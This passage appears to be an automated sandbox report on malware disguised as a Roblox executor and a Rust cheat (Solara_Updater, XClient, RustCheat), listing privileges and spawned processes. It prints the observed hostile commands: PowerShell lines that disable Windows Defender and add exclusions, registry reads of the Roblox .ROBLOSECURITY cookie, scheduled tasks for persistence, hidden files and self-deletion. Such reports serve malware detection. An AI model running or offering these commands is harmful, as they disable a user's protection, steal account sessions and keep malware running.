| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\hostNet\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\hostNet\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5c30zw5y\5c30zw5y.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1AC.tmp" "c:\Users\Admin\AppData\Roaming\CSCEBF7F73354034CD7AD6BE25A5A5285C1.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwvpx0np\vwvpx0np.cmdline"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB239.tmp" "c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Templates\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Solara_Updater" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Solara_UpdaterS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\Solara_Updater.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 6 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EEJCG9hD9w.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet\bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
C:\hostNet\bridgeblockportComBroker.exe
"C:\hostNet/bridgeblockportComBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\sol.exe
"C:\Users\Admin\AppData\Local\Temp\sol.exe"
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
